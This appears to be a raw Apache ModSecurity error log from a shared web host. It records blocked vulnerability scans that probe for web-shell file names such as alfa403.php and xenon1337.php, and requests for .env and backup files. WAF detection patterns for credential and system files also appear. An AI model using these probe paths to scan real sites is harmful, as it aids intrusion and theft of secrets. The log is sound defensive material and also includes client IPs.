[Tue May 26 16:18:50.654767 2026] [security2:error] [pid 782634:tid 782810] [client 95.164.108.85:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahV6kv_P9qBfeb1w76Zc5wAAAC4"], referer: https://anujtradingco.com
[Tue May 26 16:18:51.165424 2026] [security2:error] [pid 782634:tid 782781] [client 57.141.2.3:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV6kv_P9qBfeb1w76Zc7QAAABE"]
[Tue May 26 16:18:51.385227 2026] [security2:error] [pid 782634:tid 782855] [client 20.151.112.53:53968] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 53.112.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.amostracomunicacao.com.br.md-74.webhostbox.net"] [uri "/error_log.php"] [unique_id "ahV6k__P9qBfeb1w76Zc-AAAAFs"]
[Tue May 26 16:18:51.385347 2026] [security2:error] [pid 782634:tid 782855] [client 20.151.112.53:53968] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "mail.amostracomunicacao.com.br.md-74.webhostbox.net"] [uri "/error_log.php"] [unique_id "ahV6k__P9qBfeb1w76Zc-AAAAFs"]
[Tue May 26 16:18:51.664181 2026] [security2:error] [pid 782634:tid 782801] [client 20.29.64.60:3712] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 60.64.29.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "srsglobalsoft.com"] [uri "/cecmpntx.php"] [unique_id "ahV6k__P9qBfeb1w76ZdBgAAACU"], referer: www.google.com
[Tue May 26 16:18:51.849456 2026] [security2:error] [pid 782634:tid 782822] [client 103.159.154.38:59345] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "302"] [hostname "anujtradingco.com"] [uri "/wp-login.php"] [unique_id "ahV6k__P9qBfeb1w76Zc9wAAADo"]
[Tue May 26 16:18:52.787911 2026] [security2:error] [pid 782634:tid 782829] [client 20.151.112.53:42457] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 53.112.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.amostracomunicacao.com.br.md-74.webhostbox.net"] [uri "/xenon1337.php"] [unique_id "ahV6lP_P9qBfeb1w76ZdJwAAAEE"]
[Tue May 26 16:18:52.788016 2026] [security2:error] [pid 782634:tid 782829] [client 20.151.112.53:42457] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "mail.amostracomunicacao.com.br.md-74.webhostbox.net"] [uri "/xenon1337.php"] [unique_id "ahV6lP_P9qBfeb1w76ZdJwAAAEE"]
[Tue May 26 16:18:53.531781 2026] [security2:error] [pid 782634:tid 782774] [client 57.141.2.63:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV6lf_P9qBfeb1w76ZdMAAAAAo"]
[Tue May 26 16:18:54.175383 2026] [security2:error] [pid 782634:tid 782795] [client 20.151.112.53:54005] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 53.112.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.amostracomunicacao.com.br.md-74.webhostbox.net"] [uri "/alfa403.php"] [unique_id "ahV6lv_P9qBfeb1w76ZdSgAAAB8"]
[Tue May 26 16:18:54.175512 2026] [security2:error] [pid 782634:tid 782795] [client 20.151.112.53:54005] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "mail.amostracomunicacao.com.br.md-74.webhostbox.net"] [uri "/alfa403.php"] [unique_id "ahV6lv_P9qBfeb1w76ZdSgAAAB8"]
[Tue May 26 16:18:54.281982 2026] [security2:error] [pid 782634:tid 782817] [client 114.119.142.125:60727] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "thegoodsporting.com"] [uri "/blog-post1.php"] [unique_id "ahV6lv_P9qBfeb1w76ZdUQAAADU"], referer: https://thegoodsporting.com/
[Tue May 26 16:18:54.845332 2026] [security2:error] [pid 782634:tid 782788] [client 20.151.112.53:53969] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 53.112.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.amostracomunicacao.com.br.md-74.webhostbox.net"] [uri "/test11.php"] [unique_id "ahV6lv_P9qBfeb1w76ZdYgAAABg"]
[Tue May 26 16:18:54.845452 2026] [security2:error] [pid 782634:tid 782788] [client 20.151.112.53:53969] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "mail.amostracomunicacao.com.br.md-74.webhostbox.net"] [uri "/test11.php"] [unique_id "ahV6lv_P9qBfeb1w76ZdYgAAABg"]
[Tue May 26 16:18:55.181218 2026] [security2:error] [pid 782634:tid 782854] [client 57.141.2.58:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV6lv_P9qBfeb1w76ZdYQAAAFo"]
[Tue May 26 16:18:56.546294 2026] [security2:error] [pid 782634:tid 782788] [client 20.151.112.53:42485] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 53.112.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.amostracomunicacao.com.br.md-74.webhostbox.net"] [uri "/koala.php"] [unique_id "ahV6mP_P9qBfeb1w76ZdjAAAABg"]
[Tue May 26 16:18:56.546399 2026] [security2:error] [pid 782634:tid 782788] [client 20.151.112.53:42485] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "mail.amostracomunicacao.com.br.md-74.webhostbox.net"] [uri "/koala.php"] [unique_id "ahV6mP_P9qBfeb1w76ZdjAAAABg"]
[Tue May 26 16:18:57.054044 2026] [security2:error] [pid 782634:tid 782783] [client 103.159.154.38:59351] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "155"] [id "900406"] [msg "wp-login POST logging"] [data "200"] [hostname "anujtradingco.com"] [uri "/wp-login.php"] [unique_id "ahV6mP_P9qBfeb1w76ZdlAAAABM"]
[Tue May 26 16:18:57.608183 2026] [security2:error] [pid 782634:tid 782802] [client 57.141.2.15:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV6mf_P9qBfeb1w76ZdlwAAACY"]
[Tue May 26 16:18:58.716647 2026] [security2:error] [pid 782634:tid 782811] [client 103.159.154.38:59353] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "302"] [hostname "anujtradingco.com"] [uri "/wp-login.php"] [unique_id "ahV6mv_P9qBfeb1w76ZdsgAAAC8"]
[Tue May 26 16:18:59.197385 2026] [autoindex:error] [pid 782634:tid 782846] [client 49.51.39.209:41686] AH01276: Cannot serve directory /home2/besglde8/public_html/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 16:18:59.358972 2026] [proxy:error] [pid 782634:tid 782865] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 16:18:59.359024 2026] [proxy_http:error] [pid 782634:tid 782865] [client 165.227.226.112:52110] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 16:18:59.359656 2026] [proxy:error] [pid 782634:tid 782865] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 16:18:59.359699 2026] [proxy_http:error] [pid 782634:tid 782865] [client 165.227.226.112:52110] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 16:18:59.656283 2026] [proxy:error] [pid 782634:tid 782835] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 16:18:59.656362 2026] [proxy_http:error] [pid 782634:tid 782835] [client 165.227.226.112:52114] AH01114: HTTP: failed to make connection to backend: 127.0.0.1, referer: http://cpcalendars.athelstan.org.in/
[Tue May 26 16:18:59.656955 2026] [proxy:error] [pid 782634:tid 782835] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 16:18:59.656992 2026] [proxy_http:error] [pid 782634:tid 782835] [client 165.227.226.112:52114] AH01114: HTTP: failed to make connection to backend: 127.0.0.1, referer: http://cpcalendars.athelstan.org.in/
[Tue May 26 16:18:59.738966 2026] [security2:error] [pid 782634:tid 782859] [client 57.141.2.9:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV6m__P9qBfeb1w76ZdxgAAAF8"]
[Tue May 26 16:19:00.042345 2026] [security2:error] [pid 782634:tid 782863] [client 20.29.64.60:3078] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 60.64.29.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "srsglobalsoft.com"] [uri "/wp-plain.php"] [unique_id "ahV6nP_P9qBfeb1w76Zd1gAAAGM"], referer: www.google.com
[Tue May 26 16:19:00.049577 2026] [security2:error] [pid 782634:tid 782829] [client 20.29.64.60:3087] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 60.64.29.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "srsglobalsoft.com"] [uri "/wp-content/themes/seotheme/db.php"] [unique_id "ahV6nP_P9qBfeb1w76Zd1wAAAEE"], referer: www.google.com
[Tue May 26 16:19:00.228172 2026] [proxy:error] [pid 782634:tid 782857] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 16:19:00.228221 2026] [proxy_http:error] [pid 782634:tid 782857] [client 165.227.226.112:56282] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 16:19:00.228824 2026] [proxy:error] [pid 782634:tid 782857] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 16:19:00.228883 2026] [proxy_http:error] [pid 782634:tid 782857] [client 165.227.226.112:56282] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 16:19:00.672066 2026] [security2:error] [pid 782634:tid 782811] [client 20.29.64.60:3075] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 60.64.29.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.srsglobalsoft.com"] [uri "/wp-content/plugins/apikey/apikey.php"] [unique_id "ahV6nP_P9qBfeb1w76Zd5wAAAC8"]
[Tue May 26 16:19:00.788740 2026] [security2:error] [pid 782634:tid 782774] [client 165.140.119.146:64097] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 146.119.140.165.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.bloggertarget.com"] [uri "/wp-comments-post.php"] [unique_id "ahV6nP_P9qBfeb1w76Zd4wAAAAo"], referer: https://www.bloggertarget.com
[Tue May 26 16:19:00.788843 2026] [security2:error] [pid 782634:tid 782774] [client 165.140.119.146:64097] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "147"] [id "900404"] [msg "wp-comments-post POST logging"] [data "409"] [hostname "www.bloggertarget.com"] [uri "/wp-comments-post.php"] [unique_id "ahV6nP_P9qBfeb1w76Zd4wAAAAo"], referer: https://www.bloggertarget.com
[Tue May 26 16:19:00.805089 2026] [security2:error] [pid 782634:tid 782782] [client 20.151.112.53:16667] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 53.112.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.amostracomunicacao.com.br.md-74.webhostbox.net"] [uri "/mac.php"] [unique_id "ahV6nP_P9qBfeb1w76Zd8AAAABI"]
[Tue May 26 16:19:00.805197 2026] [security2:error] [pid 782634:tid 782782] [client 20.151.112.53:16667] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "mail.amostracomunicacao.com.br.md-74.webhostbox.net"] [uri "/mac.php"] [unique_id "ahV6nP_P9qBfeb1w76Zd8AAAABI"]
[Tue May 26 16:19:01.019995 2026] [security2:error] [pid 782634:tid 782855] [client 20.151.112.53:39184] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 53.112.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.amostracomunicacao.com.br.md-74.webhostbox.net"] [uri "/25d653587fdfd1.php"] [unique_id "ahV6nf_P9qBfeb1w76Zd-AAAAFs"]
[Tue May 26 16:19:01.020099 2026] [security2:error] [pid 782634:tid 782855] [client 20.151.112.53:39184] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "mail.amostracomunicacao.com.br.md-74.webhostbox.net"] [uri "/25d653587fdfd1.php"] [unique_id "ahV6nf_P9qBfeb1w76Zd-AAAAFs"]
[Tue May 26 16:19:01.023137 2026] [security2:error] [pid 782634:tid 782785] [client 57.141.2.16:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV6nP_P9qBfeb1w76Zd5gAAABU"]
[Tue May 26 16:19:01.665163 2026] [security2:error] [pid 782634:tid 782767] [client 49.43.133.89:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV6nP_P9qBfeb1w76Zd8QAAAAM"]
[Tue May 26 16:19:03.002949 2026] [security2:error] [pid 782634:tid 782824] [client 20.29.64.60:3087] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 60.64.29.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.srsglobalsoft.com"] [uri "/plugins/content/apismtp/apismtp.php"] [unique_id "ahV6n__P9qBfeb1w76ZeJQAAADw"]
[Tue May 26 16:19:03.029010 2026] [security2:error] [pid 782634:tid 782766] [client 20.29.64.60:3111] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 60.64.29.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "srsglobalsoft.com"] [uri "/aacrxxvv.php"] [unique_id "ahV6n__P9qBfeb1w76ZeJgAAAAI"], referer: www.google.com
[Tue May 26 16:19:03.110600 2026] [security2:error] [pid 782634:tid 782796] [client 45.45.237.225:56488] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "dgssi.in"] [uri "/.env"] [unique_id "ahV6n__P9qBfeb1w76ZeKwAAACA"]
[Tue May 26 16:19:03.117816 2026] [security2:error] [pid 782634:tid 782834] [client 45.45.237.225:56656] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "dgssi.in"] [uri "/firebase.json"] [unique_id "ahV6n__P9qBfeb1w76ZePQAAAEY"]
[Tue May 26 16:19:03.117957 2026] [security2:error] [pid 782634:tid 782834] [client 45.45.237.225:56656] ModSecurity: Warning. Matched phrase "CCBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "dgssi.in"] [uri "/firebase.json"] [unique_id "ahV6n__P9qBfeb1w76ZePQAAAEY"]
[Tue May 26 16:19:03.118462 2026] [security2:error] [pid 782634:tid 782799] [client 45.45.237.225:56516] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.backup$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1279"] [id "390588"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .backup)"] [severity "CRITICAL"] [hostname "dgssi.in"] [uri "/.env.backup"] [unique_id "ahV6n__P9qBfeb1w76ZeOAAAACM"]
[Tue May 26 16:19:03.121510 2026] [security2:error] [pid 782634:tid 782865] [client 45.45.237.225:56514] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "dgssi.in"] [uri "/.env.bak"] [unique_id "ahV6n__P9qBfeb1w76ZePgAAAGU"]
[Tue May 26 16:19:03.549374 2026] [security2:error] [pid 782634:tid 782839] [client 103.159.154.38:59358] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "155"] [id "900406"] [msg "wp-login POST logging"] [data "200"] [hostname "anujtradingco.com"] [uri "/wp-login.php"] [unique_id "ahV6n__P9qBfeb1w76ZeUAAAAEs"]
[Tue May 26 16:19:03.701792 2026] [proxy:error] [pid 782634:tid 782856] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 16:19:03.701871 2026] [proxy_http:error] [pid 782634:tid 782856] [client 165.227.226.112:56404] AH01114: HTTP: failed to make connection to backend: 127.0.0.1, referer: https://cpcalendars.athelstan.org.in/
[Tue May 26 16:19:03.702486 2026] [proxy:error] [pid 782634:tid 782856] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 16:19:03.702528 2026] [proxy_http:error] [pid 782634:tid 782856] [client 165.227.226.112:56404] AH01114: HTTP: failed to make connection to backend: 127.0.0.1, referer: https://cpcalendars.athelstan.org.in/
[Tue May 26 16:19:04.050264 2026] [security2:error] [pid 782634:tid 782871] [client 57.141.2.55:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV6n__P9qBfeb1w76ZeTwAAAGs"]
[Tue May 26 16:19:04.668244 2026] [security2:error] [pid 782634:tid 782834] [client 45.45.237.225:56446] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "dgssi.in"] [uri "/dgssi-order-history.php"] [unique_id "ahV6oP_P9qBfeb1w76ZecAAAAEY"]
[Tue May 26 16:19:04.668393 2026] [security2:error] [pid 782634:tid 782834] [client 45.45.237.225:56446] ModSecurity: Warning. Matched phrase "CCBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "dgssi.in"] [uri "/dgssi-order-history.php"] [unique_id "ahV6oP_P9qBfeb1w76ZecAAAAEY"]
[Tue May 26 16:19:04.713168 2026] [security2:error] [pid 782634:tid 782796] [client 45.45.237.225:56432] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 225.237.45.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "dgssi.in"] [uri "/index.php"] [unique_id "ahV6oP_P9qBfeb1w76ZeaQAAACA"]
[Tue May 26 16:19:04.725373 2026] [security2:error] [pid 782634:tid 782885] [client 45.45.237.225:56492] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 225.237.45.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "dgssi.in"] [uri "/dgssi-order-overview.php"] [unique_id "ahV6oP_P9qBfeb1w76ZebQAAAHk"]
[Tue May 26 16:19:04.725581 2026] [security2:error] [pid 782634:tid 782867] [client 45.45.237.225:56438] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 225.237.45.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "dgssi.in"] [uri "/dgssi-officers-archives.php"] [unique_id "ahV6oP_P9qBfeb1w76ZebAAAAGc"]
[Tue May 26 16:19:04.725943 2026] [security2:error] [pid 782634:tid 782809] [client 45.45.237.225:56650] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 225.237.45.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "dgssi.in"] [uri "/dgssi-regalia.php"] [unique_id "ahV6oP_P9qBfeb1w76ZebwAAAC0"]
[Tue May 26 16:19:04.725997 2026] [security2:error] [pid 782634:tid 782783] [client 45.45.237.225:56416] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 225.237.45.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "dgssi.in"] [uri "/dgssi-officers-pastranks.php"] [unique_id "ahV6oP_P9qBfeb1w76ZecQAAABM"]
[Tue May 26 16:19:04.726002 2026] [security2:error] [pid 782634:tid 782832] [client 45.45.237.225:56702] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 225.237.45.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "dgssi.in"] [uri "/dgssi-officers-active.php"] [unique_id "ahV6oP_P9qBfeb1w76ZeawAAAEQ"]
[Tue May 26 16:19:04.739053 2026] [security2:error] [pid 782634:tid 782822] [client 45.45.237.225:56514] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 225.237.45.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "dgssi.in"] [uri "/dgssi-consistories-meeting.php"] [unique_id "ahV6oP_P9qBfeb1w76ZebgAAADo"]
[Tue May 26 16:19:04.756968 2026] [security2:error] [pid 782634:tid 782764] [client 45.45.237.225:56556] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 225.237.45.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "dgssi.in"] [uri "/dgssi-consistories-list.php"] [unique_id "ahV6oP_P9qBfeb1w76ZeagAAAAA"]
[Tue May 26 16:19:04.758479 2026] [security2:error] [pid 782634:tid 782794] [client 45.45.237.225:56538] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 225.237.45.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "dgssi.in"] [uri "/dgssi-gallery-photos.php"] [unique_id "ahV6oP_P9qBfeb1w76ZecgAAAB4"]
